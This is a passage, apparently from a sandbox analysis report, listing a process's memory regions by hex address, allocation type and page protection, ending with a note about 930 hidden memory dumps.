heap
page read and write
7FF84882D000
trusted library allocation
page execute and read and write
220B4984000
heap
page read and write
2209C8EC000
trusted library allocation
page read and write
1C1C5F67000
heap
page read and write
7FF848823000
trusted library allocation
page execute and read and write
27908A01000
trusted library allocation
page read and write
27901401000
trusted library allocation
page read and write
220B4930000
heap
page read and write
2CC1E9CC000
heap
page read and write
7FF848B40000
trusted library allocation
page read and write
2CC1EC92000
heap
page read and write
22ECD547000
heap
page read and write
22ECB7CB000
heap
page read and write
1C1C5F54000
heap
page read and write
27939E40000
heap
page read and write
1C1BDC2D000
trusted library allocation
page read and write
22ECBA69000
heap
page read and write
212E2F3E000
heap
page read and write
22ECF0CE000
heap
page read and write
4D9D000
stack
page read and write
22ECB792000
heap
page read and write
12D0000
trusted library allocation
page read and write
6C6E000
stack
page read and write
2209A908000
heap
page read and write
22ECD600000
heap
page read and write
2CC1EA3D000
heap
page read and write
F60000
trusted library allocation
page read and write
22ECBA68000
heap
page read and write
22ECD51B000
heap
page read and write
2CC1ECBF000
heap
page read and write
7FF8489C2000
trusted library allocation
page read and write
B6DC37C000
stack
page read and write
212E2F00000
heap
page read and write
2CC1E9DB000
heap
page read and write
11CE000
stack
page read and write
22ECB719000
heap
page read and write
2CC1EC1D000
heap
page read and write
22ECB7C5000
heap
page read and write
FA0000
heap
page read and write
212E2DF3000
heap
page read and write
22ECD7B4000
heap
page read and write
212E2DC2000
heap
page read and write
7FF8489FA000
trusted library allocation
page read and write
2CC1EA03000
heap
page read and write
212E4B26000
heap
page read and write
7FF848A02000
trusted library allocation
page read and write
1C1C5F50000
heap
page read and write
1C1ABBFE000
heap
page read and write
2CC1F3A0000
heap
page read and write
5C8527E000
stack
page read and write
22ECD532000
heap
page read and write
2209CC67000
trusted library allocation
page read and write
2CC1CC2E000
heap
page read and write
1C1ABDC4000
heap
page read and write
22ECBA6E000
heap
page read and write
1C1AD57A000
heap
page read and write
220B4A1E000
heap
page read and write
5C855FE000
stack
page read and write
212E2DFB000
heap
page read and write
7FF848940000
trusted library allocation
page execute and read and write
67AE000
stack
page read and write
C833D7E000
stack
page read and write
2CC1EC1F000
heap
page read and write
22ECB72B000
heap
page read and write
2CC1F588000
heap
page read and write
2CC1CC6B000
heap
page read and write
51C0000
heap
page read and write
1C1ABC25000
heap
page read and write
65F2000
heap
page read and write
2CC1F4FF000
heap
page read and write
F10000
heap
page read and write
1C1ADBB1000
trusted library allocation
page read and write
22ECD520000
heap
page read and write
22ECD550000
heap
page read and write
22ECD50F000
heap
page read and write
1C1ABA50000
heap
page read and write
2CC1EA03000
heap
page read and write
2793BDE1000
trusted library allocation
page read and write
1C1BDBB1000
trusted library allocation
page read and write
212E4BFB000
heap
page read and write
212E4B1C000
heap
page read and write
22ECD7B5000
heap
page read and write
2CC1CECE000
heap
page read and write
22ECB720000
heap
page read and write
212E2F30000
heap
page read and write
22ECB70B000
heap
page read and write
2CC1CC2E000
heap
page read and write
212E4DB5000
heap
page read and write
212E4B54000
heap
page read and write
212E6670000
heap
page read and write
B6DD0CB000
stack
page read and write
7FF84885B000
trusted library allocation
page read and write
220B49F4000
heap
page read and write
F90000
trusted library allocation
page read and write
22ECD527000
heap
page read and write
2CC1E9EC000
heap
page read and write
2209C530000
heap
page read and write
2CC1F580000
heap
page read and write
212E4BAA000
heap
page read and write
1C1AE7DC000
trusted library allocation
page read and write
B6DBB92000
stack
page read and write
1C1BDBC0000
trusted library allocation
page read and write
2CC1CC7E000
heap
page read and write
10C4000
heap
page read and write
7FF8489E0000
trusted library allocation
page execute and read and write
2CC1F47F000
heap
page read and write
22ECB71F000
heap
page read and write
5101000
trusted library allocation
page read and write
22ECD576000
heap
page read and write
2CC1EC73000
heap
page read and write
2CC1EA0A000
heap
page read and write
5C84DFE000
stack
page read and write
2CC1EA03000
heap
page read and write
22ECD527000
heap
page read and write
2CC1F47F000
heap
page read and write
220AC8F0000
trusted library allocation
page read and write
D4818FF000
stack
page read and write
22ECD5A5000
heap
page read and write
2CC1ECF2000
heap
page read and write
2CC1F480000
heap
page read and write
212E4B3B000
heap
page read and write
212E4BEE000
heap
page read and write
7FF848A50000
trusted library allocation
page read and write
2209C906000
trusted library allocation
page read and write
212E2E03000
heap
page read and write
1C1ABBE8000
heap
page read and write
5A60000
trusted library allocation
page read and write
B6DC2F9000
stack
page read and write
E1B65FF000
stack
page read and write
6A2C000
stack
page read and write
2CC1CBAE000
heap
page read and write
C833DFD000
stack
page read and write
B6DC278000
stack
page read and write
7FF848B10000
trusted library allocation
page read and write
5CBC0FE000
stack
page read and write
E1B66FE000
stack
page read and write
212E4B37000
heap
page read and write
400000
remote allocation
page execute and read and write
2CC1EA3D000
heap
page read and write
7FF848B10000
trusted library allocation
page read and write
2793BD26000
heap
page execute and read and write
65DE000
heap
page read and write
2209CD12000
trusted library allocation
page read and write
2209CCF6000
trusted library allocation
page read and write
7FF848A30000
trusted library allocation
page read and write
2CC1ECBF000
heap
page read and write
2CC1E9FF000
heap
page read and write
F4D000
trusted library allocation
page execute and read and write
22ECB7BB000
heap
page read and write
50E0000
trusted library allocation
page read and write
7FF848822000
trusted library allocation
page read and write
D481BFE000
stack
page read and write
212E2CF0000
heap
page read and write
212E4BE5000
heap
page read and write
212E4B1F000
heap
page read and write
1C1ABC2A000
heap
page read and write
C5B000
stack
page read and write
220B4A2D000
heap
page read and write
212E4B71000
heap
page read and write
50F2000
trusted library allocation
page read and write
212E4B10000
heap
page read and write
22ECD504000
heap
page read and write
2CC1EC94000
heap
page read and write
2CC1EC19000
heap
page read and write
212E2E94000
heap
page read and write
5500000
heap
page read and write
2793B890000
trusted library allocation
page read and write
212E2DFF000
heap
page read and write
2CC1E9BF000
heap
page read and write
22ECD533000
heap
page read and write
C8342BE000
stack
page read and write
7FF848AA0000
trusted library allocation
page read and write
2CC1E9B1000
heap
page read and write
212E2DD2000
heap
page read and write
2CC1CEC8000
heap
page read and write
1C1ABBE4000
heap
page read and write
27903C01000
trusted library allocation
page read and write
22ECB7BC000
heap
page read and write
E1B63FE000
stack
page read and write
7FF848AC0000
trusted library allocation
page read and write
2209AAB0000
trusted library allocation
page read and write
7F470000
trusted library allocation
page execute and read and write
3C01000
trusted library allocation
page read and write
7FF848B20000
trusted library allocation
page read and write
54AC000
stack
page read and write
2CC1ECF8000
heap
page read and write
212E4B20000
heap
page read and write
22ECD509000
heap
page read and write
2209CE83000
trusted library allocation
page read and write
2CC1CB80000
heap
page read and write
1C1ADA70000
heap
page execute and read and write
2209A936000
heap
page read and write
7FF848926000
trusted library allocation
page execute and read and write
212E2E03000
heap
page read and write
2CC1EA3D000
heap
page read and write
212E4BFF000
heap
page read and write
2209C536000
heap
page read and write
2CC1EC73000
heap
page read and write
2790A801000
trusted library allocation
page read and write
22ECD58E000
heap
page read and write
1C1C5F7F000
heap
page read and write
2CC1EEA0000
trusted library allocation
page read and write
22ECD501000
heap
page read and write
7FF8489F0000
trusted library allocation
page execute and read and write
1C1ABDCE000
heap
page read and write
212E4B25000
heap
page read and write
212E4B11000
heap
page read and write
2209C9B1000
trusted library allocation
page read and write
102C000
stack
page read and write
571D000
stack
page read and write
2CC1EC5E000
heap
page read and write
2209A830000
heap
page read and write
22ECB725000
heap
page read and write
22ECD6FE000
heap
page read and write
2CC1CC6B000
heap
page read and write
212E2E03000
heap
page read and write
22ECB7B9000
heap
page read and write
50E4000
trusted library allocation
page read and write
5C852FF000
stack
page read and write
27908001000
trusted library allocation
page read and write
22ECD50C000
heap
page read and write
212E4B48000
heap
page read and write
212E4BF6000
heap
page read and write
2209C997000
trusted library allocation
page read and write
2209CDEC000
trusted library allocation
page read and write
22ECD544000
heap
page read and write
2209CE3A000
trusted library allocation
page read and write
5A41000
trusted library allocation
page read and write
212E2D50000
heap
page read and write
7FF848830000
trusted library allocation
page read and write
7FF848A30000
trusted library allocation
page execute and read and write
22ECD5DE000
heap
page read and write
212E2E03000
heap
page read and write
212E2F38000
heap
page read and write
22ECB72F000
heap
page read and write
5CBBAF9000
stack
page read and write
2CC1F426000
heap
page read and write
5106000
trusted library allocation
page read and write
2CC1EBE0000
heap
page read and write
22ECB726000
heap
page read and write
F5D000
trusted library allocation
page execute and read and write
2CC1CECE000
heap
page read and write
7FF848842000
trusted library allocation
page read and write
212E4B5C000
heap
page read and write
2CC1CC01000
heap
page read and write
1C1AF3E5000
trusted library allocation
page read and write
E1B5D24000
stack
page read and write
F43000
trusted library allocation
page execute and read and write
2CC1EC00000
heap
page read and write
22ECB7BE000
heap
page read and write
2209C91A000
trusted library allocation
page read and write
7FF8488DC000
trusted library allocation
page execute and read and write
5C84DB3000
stack
page read and write
212E4D0E000
heap
page read and write
5C8507E000
unkown
page read and write
212E2DF0000
heap
page read and write
2793B8F0000
heap
page read and write
2209C520000
heap
page read and write
2209CFAA000
trusted library allocation
page read and write
2209CCF1000
trusted library allocation
page read and write
2CC1F3A9000
heap
page read and write
2209AAE0000
heap
page readonly
1C1C5BD0000
heap
page read and write
5C850FE000
stack
page read and write
117F000
heap
page read and write
220B4986000
heap
page read and write
1C1AF7B3000
trusted library allocation
page read and write
B6DC5FB000
stack
page read and write
C833E7F000
stack
page read and write
2CC1EC05000
heap
page read and write
2209A8EE000
heap
page read and write
22ECB710000
heap
page read and write
212E2F38000
heap
page read and write
2CC1CB88000
heap
page read and write
2CC1CBD8000
heap
page read and write
2CC1F588000
heap
page read and write
212E2DEF000
heap
page read and write
220B4A15000
heap
page read and write
2CC1CC6B000
heap
page read and write
212E2DFB000
heap
page read and write
27939E50000
heap
page read and write
2CC1CC45000
heap
page read and write
1C1C5BB0000
heap
page read and write
212E4B37000
heap
page read and write
2CC1EC50000
heap
page read and write
2CC1EA03000
heap
page read and write
7FF848B60000
trusted library allocation
page read and write
7FF8488F0000
trusted library allocation
page read and write
2CC1ECBF000
heap
page read and write
5C85578000
stack
page read and write
2CC1E9B5000
heap
page read and write
2CC1E9B2000
heap
page read and write
212E2D4A000
heap
page read and write
2CC1CC7C000
heap
page read and write
1C1ABD43000
trusted library allocation
page read and write
220B48F0000
heap
page execute and read and write
212E4B2B000
heap
page read and write
E1B6BFB000
stack
page read and write
B6DBF7E000
stack
page read and write
22ECD5BA000
heap
page read and write
212E2DE9000
heap
page read and write
6D6E000
stack
page read and write
627E000
stack
page read and write
7FF848A60000
trusted library allocation
page read and write
65B0000
heap
page read and write
212E2DF3000
heap
page read and write
B6DBBDF000
stack
page read and write
2CC1F47F000
heap
page read and write
212E2DFB000
heap
page read and write
22ECB7C3000
heap
page read and write
1C1C5C99000
heap
page read and write
22ECB79D000
heap
page read and write
1C1C5C0A000
heap
page read and write
1C1ABBA0000
heap
page read and write
2CC1EBD0000
remote allocation
page read and write
3C29000
trusted library allocation
page read and write
6450000
heap
page read and write
2CC1E9C4000
heap
page read and write
27939E88000
heap
page read and write
212E2D20000
heap
page read and write
5469000
stack
page read and write
2CC1CBD8000
heap
page read and write
5170000
trusted library allocation
page read and write
212E2DF1000
heap
page read and write
212E2E90000
heap
page read and write
6460000
heap
page read and write
2793B916000
heap
page read and write
212E4B14000
heap
page read and write
22ECD586000
heap
page read and write
1C1C5C5F000
heap
page read and write
22ECBA60000
heap
page read and write
212E2F35000
heap
page read and write
220B4936000
heap
page read and write
212E4B9E000
heap
page read and write
2209A8A0000
heap
page read and write
2CC1ECBF000
heap
page read and write
212E4BE5000
heap
page read and write
1C1C5BFC000
heap
page read and write
1C1ADBA0000
heap
page read and write
1C1ADDDC000
trusted library allocation
page read and write
22ECD59A000
heap
page read and write
2209C8CE000
trusted library allocation
page read and write
22ECB71A000
heap
page read and write
2CC1E9B8000
heap
page read and write
B6DD04D000
stack
page read and write
2CC1EC14000
heap
page read and write
212E4B60000
heap
page read and write
27909401000
trusted library allocation
page read and write
D4815E9000
stack
page read and write
1C1AF7B8000
trusted library allocation
page read and write
2CC1EA03000
heap
page read and write
5CBC1FF000
stack
page read and write
1C1C5F40000
heap
page read and write
212E4B37000
heap
page read and write
5C861CE000
stack
page read and write
1C1C5C16000
heap
page read and write
D481CFF000
stack
page read and write
109B000
heap
page read and write
22ECD710000
heap
page read and write
2CC1CB00000
heap
page read and write
212E4D0D000
heap
page read and write
1132000
heap
page read and write
7FF848AD0000
trusted library allocation
page read and write
2CC1EA0A000
heap
page read and write
220B494A000
heap
page read and write
2CC1E9C7000
heap
page read and write
7FF848B70000
trusted library allocation
page read and write
7FF848AF0000
trusted library allocation
page read and write
22ECD501000
heap
page read and write
2209ABB0000
heap
page read and write
7FF848A90000
trusted library allocation
page read and write
2CC1F59E000
heap
page read and write
1C1ABCD0000
trusted library allocation
page read and write
2CC1E9E0000
heap
page read and write
2CC1EA3D000
heap
page read and write
212E2D4F000
heap
page read and write
212E2D4A000
heap
page read and write
7FF848B00000
trusted library allocation
page read and write
1C1AED16000
trusted library allocation
page read and write
F15000
heap
page read and write
1C1C5C7C000
heap
page read and write
2CC1CC6B000
heap
page read and write
59BE000
stack
page read and write
2CC1CBBD000
heap
page read and write
1C1ABBB6000
heap
page read and write
5120000
trusted library allocation
page read and write
2CC1CBE7000
heap
page read and write
2CC1EC24000
heap
page read and write
27939F0D000
heap
page read and write
B6DC4FE000
stack
page read and write
1C1C5F61000
heap
page read and write
22ECD5C6000
heap
page read and write
2209A8E0000
heap
page read and write
2CC1E9FF000
heap
page read and write
2209C9E7000
trusted library allocation
page read and write
212E4B17000
heap
page read and write
2793A050000
heap
page read and write
2CC1CEC0000
heap
page read and write
5C854FC000
stack
page read and write
2CC1F580000
heap
page read and write
2CC1F3AC000
heap
page read and write
22ECB7C1000
heap
page read and write
1C1ABCF0000
trusted library allocation
page read and write
12F6000
heap
page read and write
212E4B63000
heap
page read and write
212E2E03000
heap
page read and write
2CC1EC11000
heap
page read and write
2CC1F47F000
heap
page read and write
27939ECB000
heap
page read and write
212E2D28000
heap
page read and write
7FF8489E0000
trusted library allocation
page read and write
1104000
heap
page read and write
27902801000
trusted library allocation
page read and write
5A70000
trusted library allocation
page execute and read and write
2793B8B0000
trusted library allocation
page read and write
2209AB60000
trusted library allocation
page read and write
2209C4B0000
heap
page execute and read and write
212E2E03000
heap
page read and write
2BE0000
trusted library allocation
page read and write
EFE000
stack
page read and write
124E000
stack
page read and write
2793B830000
heap
page read and write
2CC1CC43000
heap
page read and write
D481EFE000
stack
page read and write
5C851FD000
stack
page read and write
2CC1EC18000
heap
page read and write
7FF848A90000
trusted library allocation
page read and write
FEE000
stack
page read and write
212E4BCA000
heap
page read and write
67ED000
stack
page read and write
2CC1EC73000
heap
page read and write
B6DBEFE000
stack
page read and write
22ECD579000
heap
page read and write
2209C9AB000
trusted library allocation
page read and write
2CC1E9B4000
heap
page read and write
2CC1F3A1000
heap
page read and write
22ECD524000
heap
page read and write
2CC1F490000
heap
page read and write
212E6870000
trusted library allocation
page read and write
22ECD5EF000
heap
page read and write
7FF848B30000
trusted library allocation
page read and write
F66000
trusted library allocation
page execute and read and write
212E2D5F000
heap
page read and write
212E4B30000
heap
page read and write
22ECB7C0000
heap
page read and write
22ECB7CB000
heap
page read and write
22ECD527000
heap
page read and write
212E2D5D000
heap
page read and write
27939EE1000
heap
page read and write
2209ABB5000
heap
page read and write
212E4D0E000
heap
page read and write
2CC1CBE7000
heap
page read and write
2209CC8E000
trusted library allocation
page read and write
1C1AF46B000
trusted library allocation
page read and write
2CC1CC43000
heap
page read and write
B6DC07E000
stack
page read and write
F53000
trusted library allocation
page read and write
E90000
heap
page read and write
7FF848A40000
trusted library allocation
page read and write
DB0000
heap
page read and write
B6DCFCE000
stack
page read and write
2CC1F59E000
heap
page read and write
2209A934000
heap
page read and write
2CC1EC79000
heap
page read and write
2CC1EE90000
heap
page read and write
22ECB726000
heap
page read and write
2CC1CC2E000
heap
page read and write
7FF8489C0000
trusted library allocation
page read and write
2CC1CC34000
heap
page read and write
2CC1F580000
heap
page read and write
6B6C000
stack
page read and write
212E4B37000
heap
page read and write
2793B91A000
heap
page read and write
F7B000
trusted library allocation
page execute and read and write
2209CE02000
trusted library allocation
page read and write
2CC1EA03000
heap
page read and write
F44000
trusted library allocation
page read and write
220B49EC000
heap
page read and write
2CC1EA03000
heap
page read and write
2BF0000
heap
page execute and read and write
212E2DF0000
heap
page read and write
22ECD5E4000
heap
page read and write
2CC1E9F4000
heap
page read and write
212E4B4F000
heap
page read and write
2CC1E9D7000
heap
page read and write
2209C99D000
trusted library allocation
page read and write
2BED000
trusted library allocation
page read and write
7FF848B30000
trusted library allocation
page read and write
7FF848A10000
trusted library allocation
page execute and read and write
1C1ABCA0000
heap
page read and write
220B4EA0000
heap
page read and write
212E2DFB000
heap
page read and write
2CC1CC6B000
heap
page read and write
B6DC17E000
stack
page read and write
1C1AF55C000
trusted library allocation
page read and write
2B9F000
stack
page read and write
7FF848850000
trusted library allocation
page read and write
22ECD5D5000
heap
page read and write
27909E01000
trusted library allocation
page read and write
1C1BDD64000
trusted library allocation
page read and write
2CC1ECFA000
heap
page read and write
120E000
stack
page read and write
2CC1CEB0000
heap
page read and write
22ECD6FE000
heap
page read and write
2209CF8A000
trusted library allocation
page read and write
2CC1E9DB000
heap
page read and write
212E2D50000
heap
page read and write
2CC1CEC5000
heap
page read and write
212E4B42000
heap
page read and write
2209C9AE000
trusted library allocation
page read and write
22ECD0B0000
heap
page read and write
2CC1EC7F000
heap
page read and write
B6DBE7E000
stack
page read and write
5A3E000
stack
page read and write
22ECB7CB000
heap
page read and write
516E000
stack
page read and write
22ECD711000
heap
page read and write
2CC1EC19000
heap
page read and write
6DEC000
stack
page read and write
212E2BF0000
heap
page read and write
7FF848A70000
trusted library allocation
page read and write
6EED000
stack
page read and write
22ECD527000
heap
page read and write
220B4B30000
heap
page read and write
22ECD514000
heap
page read and write
1C1AF036000
trusted library allocation
page read and write
F77000
trusted library allocation
page execute and read and write
7FF848960000
trusted library allocation
page execute and read and write
2CC1ECFA000
heap
page read and write
C833F7E000
stack
page read and write
7FF848AF0000
trusted library allocation
page read and write
212E2D49000
heap
page read and write
212E4B24000
heap
page read and write
2CC1F584000
heap
page read and write
22ECD51B000
heap
page read and write
2209CC56000
trusted library allocation
page read and write
22ECD500000
heap
page read and write
5520000
heap
page read and write
10D0000
heap
page read and write
22ECB7CF000
heap
page read and write
212E4C73000
heap
page read and write
2209CF9D000
trusted library allocation
page read and write
212E4BCD000
heap
page read and write
5CBBCFE000
stack
page read and write
212E4B81000
heap
page read and write
2209CE2A000
trusted library allocation
page read and write
1030000
heap
page read and write
C83443C000
stack
page read and write
212E4B2B000
heap
page read and write
2209AAD0000
trusted library allocation
page read and write
22ECD520000
heap
page read and write
22ECBA65000
heap
page read and write
7FF8488E0000
trusted library allocation
page execute and read and write
212E4BD9000
heap
page read and write
212E4D11000
heap
page read and write
212E4B89000
heap
page read and write
7FF848AE0000
trusted library allocation
page read and write
212E2F3D000
heap
page read and write
2CC1F53E000
heap
page read and write
2CC1ECEA000
heap
page read and write
2CC1EC1E000
heap
page read and write
7FF848AB0000
trusted library allocation
page read and write
1C1C5BC3000
heap
page read and write
2CC1CC33000
heap
page read and write
1C1ABB30000
heap
page read and write
212E4BF4000
heap
page read and write
E1B60FE000
stack
page read and write
7FF848AA0000
trusted library allocation
page read and write
22ECF410000
trusted library allocation
page read and write
22ECD527000
heap
page read and write
2CC1F581000
heap
page read and write
7FF8488FC000
trusted library allocation
page execute and read and write
212E2DFB000
heap
page read and write
2793BD20000
heap
page execute and read and write
212E4D10000
heap
page read and write
212E4BA1000
heap
page read and write
2CC1EC24000
heap
page read and write
22ECBA68000
heap
page read and write
212E2DEB000
heap
page read and write
1C1ABBA8000
heap
page read and write
22ECB7CB000
heap
page read and write
1060000
trusted library allocation
page execute and read and write
2CC1EC8F000
heap
page read and write
22ECD0B4000
heap
page read and write
2CC1EAF0000
heap
page read and write
2CC1CBA9000
heap
page read and write
22ECB7C0000
heap
page read and write
212E4BBE000
heap
page read and write
50FE000
trusted library allocation
page read and write
2CC1F47F000
heap
page read and write
212E2DEB000
heap
page read and write
22ECD5DF000
heap
page read and write
7FF848A00000
trusted library allocation
page execute and read and write
12E0000
trusted library allocation
page read and write
2793BDD0000
heap
page execute and read and write
22ECD5A2000
heap
page read and write
22ECB72D000
heap
page read and write
212E4BC1000
heap
page read and write
1C1ABBEC000
heap
page read and write
2CC1CBAF000
heap
page read and write
2CC1F455000
heap
page read and write
2CC1EA0A000
heap
page read and write
212E4BE2000
heap
page read and write
E1B67FB000
stack
page read and write
22ECD5EB000
heap
page read and write
7DF473740000
trusted library allocation
page execute and read and write
22ECD6FC000
heap
page read and write
5CBBBFF000
stack
page read and write
5112000
trusted library allocation
page read and write
E1B64FE000
stack
page read and write
1C1ADB40000
heap
page execute and read and write
2793B8A0000
heap
page readonly
212E4BC6000
heap
page read and write
22ECB680000
heap
page read and write
1C1AF6EE000
trusted library allocation
page read and write
2CC1EC79000
heap
page read and write
212E4C11000
heap
page read and write
212E4D0C000
heap
page read and write
212E4B30000
heap
page read and write
B6DBFFD000
stack
page read and write
22ECD515000
heap
page read and write
12CE000
stack
page read and write
22ECBA6A000
heap
page read and write
22ECD50F000
heap
page read and write
5510000
heap
page execute and read and write
2CC1EE70000
heap
page read and write
2CC1ECBF000
heap
page read and write
2CC1CC43000
heap
page read and write
2CC1E9CA000
heap
page read and write
22ECD507000
heap
page read and write
22ECB7A2000
heap
page read and write
7FF848A70000
trusted library allocation
page read and write
212E2D40000
heap
page read and write
50EB000
trusted library allocation
page read and write
C833C3F000
unkown
page read and write
22ECD53F000
heap
page read and write
7FF8488D6000
trusted library allocation
page read and write
22ECB670000
heap
page read and write
22ECB6F0000
heap
page read and write
10CE000
heap
page read and write
C8343BE000
stack
page read and write
2CC1EA3D000
heap
page read and write
220AC881000
trusted library allocation
page read and write
2CC1EA0A000
heap
page read and write
1C1C5BFA000
heap
page read and write
22ECB7C3000
heap
page read and write
2C3D000
trusted library allocation
page read and write
2CC1E9B6000
heap
page read and write
22ECB792000
heap
page read and write
2CC1F589000
heap
page read and write
7FF848B50000
trusted library allocation
page read and write
212E4B43000
heap
page read and write
1C1ABBDE000
heap
page read and write
2CC1EA03000
heap
page read and write
2793B914000
heap
page read and write
C833CBE000
stack
page read and write
2CC1EC10000
heap
page read and write
22ECD5D2000
heap
page read and write
7FF848B40000
trusted library allocation
page read and write
212E2DEE000
heap
page read and write
3C68000
trusted library allocation
page read and write
212E2DCD000
heap
page read and write
51C3000
heap
page read and write
212E4BEF000
heap
page read and write
7FF848A80000
trusted library allocation
page read and write
2CC1EA05000
heap
page read and write
5C8537E000
stack
page read and write
212E2F39000
heap
page read and write
220AC890000
trusted library allocation
page read and write
2CC1E9B7000
heap
page read and write
7FF848AD0000
trusted library allocation
page read and write
220B493F000
heap
page read and write
B6DC0FD000
stack
page read and write
212E6679000
heap
page read and write
220B4939000
heap
page read and write
212E2F3A000
heap
page read and write
1C1ABDC0000
heap
page read and write
2CC1CC45000
heap
page read and write
22ECB792000
heap
page read and write
212E4D0E000
heap
page read and write
2CC1CC01000
heap
page read and write
7FF848906000
trusted library allocation
page execute and read and write
7FF848A60000
trusted library allocation
page read and write
2CC1F3B3000
heap
page read and write
22ECD571000
heap
page read and write
2CC1EA3D000
heap
page read and write
2CC1EA03000
heap
page read and write
2CC1EC12000
heap
page read and write
22ECD5BD000
heap
page read and write
6619000
heap
page read and write
1C1AD6A4000
heap
page read and write
212E4B16000
heap
page read and write
F50000
trusted library allocation
page read and write
220B4A10000
heap
page read and write
212E4B30000
heap
page read and write
2209C881000
trusted library allocation
page read and write
2C39000
trusted library allocation
page read and write
212E4BB5000
heap
page read and write
22ECB7CB000
heap
page read and write
7FF848A40000
trusted library allocation
page read and write
220B493C000
heap
page read and write
212E4B37000
heap
page read and write
2CC1F3AD000
heap
page read and write
617E000
stack
page read and write
1C1ADAF0000
heap
page execute and read and write
2CC1EC94000
heap
page read and write
22ECD601000
heap
page read and write
2CC1F3FB000
heap
page read and write
212E4C10000
heap
page read and write
7FF8489DA000
trusted library allocation
page read and write
2CC1EA0A000
heap
page read and write
22ECD5D5000
heap
page read and write
There are 930 hidden memdumps, click here to show them.